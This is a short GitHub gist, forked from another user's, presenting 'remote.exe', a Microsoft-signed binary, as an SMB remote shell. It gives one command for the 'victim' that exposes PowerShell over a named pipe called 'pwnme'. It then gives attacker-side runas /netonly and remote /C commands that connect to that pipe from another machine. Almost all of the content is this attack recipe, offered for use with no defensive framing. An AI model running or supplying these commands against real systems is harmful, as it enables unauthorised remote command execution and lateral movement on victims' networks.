Forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
Created
November 22, 2016 10:30
-
-
Save kost/9139f9ec5fa1afac38659c669a70234b to your computer and use it in GitHub Desktop.
remote.exe - a useful, MS signed SMB shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Command to run on the victim | |
# This will establish a PowerShell listener over the "pwnme" named pipe | |
remote /S "powershell.exe" pwnme | |
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
remote /C [Hostname\IP] "pwnme" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment